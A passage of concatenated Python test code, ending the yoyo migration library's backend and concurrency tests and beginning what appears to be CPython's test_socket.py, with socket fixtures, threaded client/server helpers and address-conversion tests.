https://bitbucket.org/ollyc/yoyo/issues/43/run-step-outside-of-transaction
"""
with NamedTemporaryFile() as tmp:
backend = get_backend("sqlite:///" + tmp.name)
backend.apply_migrations(read_migrations(tmpdir))
assert "yoyo_test_a" in backend.list_tables()
assert "yoyo_test_b" in backend.list_tables()
assert "yoyo_test_c" in backend.list_tables()
class TestConcurrency(object):
# How long to lock for: long enough to allow a migration to be loaded and
lock_duration = 0.2
# started without unduly slowing down the test suite
def do_something_with_lock(self, dburi):
with get_backend(dburi).lock():
time.sleep(self.lock_duration)
def skip_if_not_concurrency_safe(self, backend):
if "sqlite" in backend.uri.scheme and backend.uri.database == ":memory:":
pytest.skip(
"Concurrency tests not supported for SQLite "
"in-memory databases, which cannot be shared "
"between threads"
)
if backend.driver.threadsafety < 1:
pytest.skip(
"Concurrency tests not supported for " "non-threadsafe backends"
)
def test_lock(self, dburi):
"""
Test that :meth:`~yoyo.backends.DatabaseBackend.lock`
acquires an exclusive lock
"""
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
t = time.time()
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with backend.lock():
delta = time.time() - t
assert delta >= self.lock_duration
thread.join()
def test_lock_times_out(self, dburi):
backend = get_backend(dburi)
self.skip_if_not_concurrency_safe(backend)
thread = Thread(target=partial(self.do_something_with_lock, dburi))
thread.start()
# Give the thread time to acquire the lock, but not enough
# to complete
time.sleep(self.lock_duration * 0.6)
with pytest.raises(exceptions.LockTimeout):
with backend.lock(timeout=0.001):
assert False, "Execution should never reach this point"
thread.join()
class TestInitConnection(object):
class MockBackend(backends.DatabaseBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
def list_tables(self):
return []
def connect(self, dburi):
return Mock()
def test_it_calls_init_connection(self):
with patch("yoyo.internalmigrations.upgrade"), patch.object(
self.MockBackend, "init_connection", Mock()
) as mock_init:
backend = self.MockBackend("", "")
connection = backend.connection
assert mock_init.call_args == call(connection)
mock_init.reset_mock()
backend.rollback()
assert mock_init.call_args_list == [call(connection)]
def test_postgresql_backend_sets_search_path(self):
class MockPGBackend(backends.PostgresqlBackend):
driver = Mock(DatabaseError=Exception, paramstyle="format")
schema = "foo"
def connect(self, dburi):
return Mock()
with patch("yoyo.internalmigrations.upgrade"):
backend = MockPGBackend("", "")
backend.rollback()
assert backend.connection.cursor().execute.call_args == call(
"SET search_path TO foo"
)
def test_postgresql_connects_with_schema(self):
dburi = next(iter(get_test_dburis(only={"postgresql"})), None)
if dburi is None:
pytest.skip("PostgreSQL backend not available")
backend = get_backend(dburi)
with backend.transaction():
backend.execute("CREATE SCHEMA foo")
try:
assert get_backend(dburi + "?schema=foo").execute(
"SHOW search_path"
).fetchone() == ("foo",)
finally:
with backend.transaction():
backend.execute("DROP SCHEMA foo CASCADE")
|
test_socket.py
|
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import array
import platform
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import string
try:
import multiprocessing
except ImportError:
multiprocessing = False
try:
import fcntl
except ImportError:
fcntl = None
HOST = support.HOST
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8') ## test unicode string and carriage return
try:
import _thread as thread
import threading
except ImportError:
thread = None
threading = None
try:
import _socket
except ImportError:
_socket = None
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_RDS = _have_socket_rds()
# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = support.bind_port(self.serv)
self.serv.listen()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketUDPTest(unittest.TestCase):
def setUp(self):
self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.port = support.bind_port(self.serv)
def tearDown(self):
self.serv.close()
self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
"""Subclass of unittest.TestCase with thread-safe cleanup methods.
This subclass protects the addCleanup() and doCleanups() methods
with a recursive lock.
"""
if threading:
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self._cleanup_lock = threading.RLock()
def addCleanup(self, *args, **kwargs):
with self._cleanup_lock:
return super().addCleanup(*args, **kwargs)
def doCleanups(self, *args, **kwargs):
with self._cleanup_lock:
return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
"""To be able to run this test, a `vcan0` CAN interface can be created with
the following commands:
# modprobe vcan
# ip link add dev vcan0 type vcan
# ifconfig vcan0 up
"""
interface = 'vcan0'
bufsize = 128
"""The CAN frame structure is defined in <linux/can.h>:
struct can_frame {
canid_t can_id; /* 32 bit CAN_ID + EFF/RTR/ERR flags */
__u8 can_dlc; /* data length code: 0 .. 8 */
__u8 data[8] __attribute__((aligned(8)));
};
"""
can_frame_fmt = "=IB3x8s"
can_frame_size = struct.calcsize(can_frame_fmt)
"""The Broadcast Management Command frame structure is defined
in <linux/can/bcm.h>:
struct bcm_msg_head {
__u32 opcode;
__u32 flags;
__u32 count;
struct timeval ival1, ival2;
canid_t can_id;
__u32 nframes;
struct can_frame frames[0];
}
`bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
`struct can_frame` definition). Must use native not standard types for packing.
"""
bcm_cmd_msg_fmt = "@3I4l2I"
bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)
def setUp(self):
self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
self.addCleanup(self.s.close)
try:
self.s.bind((self.interface,))
except OSError:
self.skipTest('network interface `%s` does not exist' %
self.interface)
class SocketRDSTest(unittest.TestCase):
"""To be able to run this test, the `rds` kernel module must be loaded:
# modprobe rds
"""
bufsize = 8192
def setUp(self):
self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
self.addCleanup(self.serv.close)
try:
self.port = support.bind_port(self.serv)
except OSError:
self.skipTest('unable to bind RDS socket')
class ThreadableTest:
"""Threadable Test class
The ThreadableTest class makes it easy to create a threaded
client/server pair from an existing unit test. To create a
new threaded class from an existing unit test, use multiple
inheritance:
class NewClass (OldClass, ThreadableTest):
pass
This class defines two new fixture functions with obvious
purposes for overriding:
clientSetUp ()
clientTearDown ()
Any new test functions within the class must then define
tests in pairs, where the test name is preceded with a
'_' to indicate the client portion of the test. Ex:
def testFoo(self):
# Server portion
def _testFoo(self):
# Client portion
Any exceptions raised by the clients during their tests
are caught and transferred to the main thread to alert
the testing framework.
Note, the server setup function cannot call any blocking
functions that rely on the client thread during setup,
unless serverExplicitReady() is called just before
the blocking call (such as in setting up a client/server
connection and performing the accept() in setUp().
"""
def __init__(self):
# Swap the true setup function
self.__setUp = self.setUp
self.__tearDown = self.tearDown
self.setUp = self._setUp
self.tearDown = self._tearDown
def serverExplicitReady(self):
"""This method allows the server to explicitly indicate that
it wants the client thread to proceed. This is useful if the
server is about to execute a blocking routine that is
dependent upon the client thread during its setup routine."""
self.server_ready.set()
def _setUp(self):
self.server_ready = threading.Event()
self.client_ready = threading.Event()
self.done = threading.Event()
self.queue = queue.Queue(1)
self.server_crashed = False
# Do some munging to start the client test.
methodname = self.id()
i = methodname.rfind('.')
methodname = methodname[i+1:]
test_method = getattr(self, '_' + methodname)
self.client_thread = thread.start_new_thread(
self.clientRun, (test_method,))
try:
self.__setUp()
except:
self.server_crashed = True
raise
finally:
self.server_ready.set()
self.client_ready.wait()
def _tearDown(self):
self.__tearDown()
self.done.wait()
if self.queue.qsize():
exc = self.queue.get()
raise exc
def clientRun(self, test_func):
self.server_ready.wait()
self.clientSetUp()
self.client_ready.set()
if self.server_crashed:
self.clientTearDown()
return
if not hasattr(test_func, '__call__'):
raise TypeError("test_func must be a callable function")
try:
test_func()
except BaseException as e:
self.queue.put(e)
finally:
self.clientTearDown()
def clientSetUp(self):
raise NotImplementedError("clientSetUp must be implemented.")
def clientTearDown(self):
self.done.set()
thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketTCPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketUDPTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketCANTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
try:
self.cli.bind((self.interface,))
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
def __init__(self, methodName='runTest'):
SocketRDSTest.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
try:
# RDS sockets must be bound explicitly to send or receive data
self.cli.bind((HOST, 0))
self.cli_addr = self.cli.getsockname()
except OSError:
# skipTest should not be called here, and will be called in the
# server instead
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class SocketConnectedTest(ThreadedTCPSocketTest):
"""Socket tests for client-server connection.
self.cli_conn is a client socket connected to the server. The
setUp() method guarantees that it is connected to the server.
"""
def __init__(self, methodName='runTest'):
ThreadedTCPSocketTest.__init__(self, methodName=methodName)
def setUp(self):
ThreadedTCPSocketTest.setUp(self)
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
ThreadedTCPSocketTest.tearDown(self)
def clientSetUp(self):
ThreadedTCPSocketTest.clientSetUp(self)
self.cli.connect((HOST, self.port))
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
def __init__(self, methodName='runTest'):
unittest.TestCase.__init__(self, methodName=methodName)
ThreadableTest.__init__(self)
def setUp(self):
self.serv, self.cli = socket.socketpair()
def tearDown(self):
self.serv.close()
self.serv = None
def clientSetUp(self):
pass
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
"""A base class for socket tests.
Subclasses must provide methods newSocket() to return a new socket
and bindSock(sock) to bind it to an unused address.
Creates a socket self.serv and sets self.serv_addr to its address.
"""
def setUp(self):
self.serv = self.newSocket()
self.bindServer()
def bindServer(self):
"""Bind server socket and set self.serv_addr to its address."""
self.bindSock(self.serv)
self.serv_addr = self.serv.getsockname()
def tearDown(self):
self.serv.close()
self.serv = None
class SocketListeningTestMixin(SocketTestBase):
"""Mixin to listen on the server socket."""
def setUp(self):
super().setUp()
self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
ThreadableTest):
"""Mixin to add client socket and allow client/server tests.
Client socket is self.cli and its address is self.cli_addr. See
ThreadableTest for usage information.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
ThreadableTest.__init__(self)
def clientSetUp(self):
self.cli = self.newClientSocket()
self.bindClient()
def newClientSocket(self):
"""Return a new socket for use as client."""
return self.newSocket()
def bindClient(self):
"""Bind client socket and set self.cli_addr to its address."""
self.bindSock(self.cli)
self.cli_addr = self.cli.getsockname()
def clientTearDown(self):
self.cli.close()
self.cli = None
ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
ThreadedSocketTestMixin):
"""Mixin to allow client/server stream tests with connected client.
Server's socket representing connection to client is self.cli_conn
and client's connection to server is self.serv_conn. (Based on
SocketConnectedTest.)
"""
def setUp(self):
super().setUp()
# Indicate explicitly we're ready for the client thread to
# proceed and then perform the blocking call to accept
self.serverExplicitReady()
conn, addr = self.serv.accept()
self.cli_conn = conn
def tearDown(self):
self.cli_conn.close()
self.cli_conn = None
super().tearDown()
def clientSetUp(self):
super().clientSetUp()
self.cli.connect(self.serv_addr)
self.serv_conn = self.cli
def clientTearDown(self):
self.serv_conn.close()
self.serv_conn = None
super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
"""Base class for Unix-domain socket tests."""
# This class is used for file descriptor passing tests, so we
# create the sockets in a private directory so that other users
# can't send anything that might be problematic for a privileged
# user running the tests.
def setUp(self):
self.dir_path = tempfile.mkdtemp()
self.addCleanup(os.rmdir, self.dir_path)
super().setUp()
def bindSock(self, sock):
path = tempfile.mktemp(dir=self.dir_path)
sock.bind(path)
self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
"""Base class for Unix-domain SOCK_STREAM tests."""
def newSocket(self):
return socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
"""Base class for IPv4 socket tests."""
host = HOST
def setUp(self):
super().setUp()
self.port = self.serv_addr[1]
def bindSock(self, sock):
support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
"""Base class for TCP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
"""Base class for UDP-over-IPv4 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
"""Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""
def newSocket(self):
return socket.socket(socket.AF_INET, socket.SOCK_STREAM,
socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
"""Base class for IPv6 socket tests."""
host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
"""Base class for UDP-over-IPv6 tests."""
def newSocket(self):
return socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
"""Skip decorated test if condition is true, add client_skip decorator.
If the decorated object is not a class, sets its attribute
"client_skip" to a decorator which will return an empty function
if the test is to be skipped, or the original function if it is
not. This can be used to avoid running the client part of a
skipped test when using ThreadableTest.
"""
def client_pass(*args, **kwargs):
pass
def skipdec(obj):
retval = unittest.skip(reason)(obj)
if not isinstance(obj, type):
retval.client_skip = lambda f: client_pass
return retval
def noskipdec(obj):
if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
obj.client_skip = lambda f: f
return obj
return skipdec if condition else noskipdec
def requireAttrs(obj, *attributes):
"""Skip decorated test if obj is missing any of the given attributes.
Sets client_skip attribute as skipWithClientIf() does.
"""
missing = [name for name in attributes if not hasattr(obj, name)]
return skipWithClientIf(
missing, "don't have " + ", ".join(name for name in missing))
def requireSocket(*args):
"""Skip decorated test if a socket cannot be created with given arguments.
When an argument is given as a string, will use the value of that
attribute of the socket module, or skip the test if it doesn't
exist. Sets client_skip attribute as skipWithClientIf() does.
"""
err = None
missing = [obj for obj in args if
isinstance(obj, str) and not hasattr(socket, obj)]
if missing:
err = "don't have " + ", ".join(name for name in missing)
else:
callargs = [getattr(socket, obj) if isinstance(obj, str) else obj
for obj in args]
try:
s = socket.socket(*callargs)
except OSError as e:
# XXX: check errno?
err = str(e)
else:
s.close()
return skipWithClientIf(
err is not None,
"can't create socket({0}): {1}".format(
", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
def test_SocketType_is_socketobject(self):
import _socket
self.assertTrue(socket.SocketType is _socket.socket)
s = socket.socket()
self.assertIsInstance(s, socket.SocketType)
s.close()
def test_repr(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
with s:
self.assertIn('fd=%i' % s.fileno(), repr(s))
self.assertIn('family=%s' % socket.AF_INET, repr(s))
self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
self.assertIn('proto=0', repr(s))
self.assertNotIn('raddr', repr(s))
s.bind(('127.0.0.1', 0))
self.assertIn('laddr', repr(s))
self.assertIn(str(s.getsockname()), repr(s))
self.assertIn('[closed]', repr(s))
self.assertNotIn('laddr', repr(s))
@unittest.skipUnless(_socket is not None, 'need _socket module')
def test_csocket_repr(self):
s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
try:
expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
% (s.fileno(), s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
finally:
s.close()
expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
% (s.family, s.type, s.proto))
self.assertEqual(repr(s), expected)
def test_weakref(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
p = proxy(s)
self.assertEqual(p.fileno(), s.fileno())
s.close()
s = None
try:
p.fileno()
except ReferenceError:
pass
else:
self.fail('Socket proxy still exists')
def testSocketError(self):
# Testing socket module exceptions
msg = "Error raising socket exception (%s)."
with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
self.assertRaises(OSError, socket.gethostbyname, addr)
self.assertRaises(OSError, socket.gethostbyaddr, addr)
for addr in [support.HOST, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOST]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
def testNtoHErrors(self):
good_values = [ 1, 2, 3, 1, 2, 3 ]
bad_values = [ -1, -2, -3, -1, -2, -3 ]
for k in good_values:
socket.ntohl(k)
socket.ntohs(k)
socket.htonl(k)
socket.htons(k)
for k in bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htonl, k)
self.assertRaises(OverflowError, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:')
assertInvalid('1:2:3:4:5:6:7:8:0')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
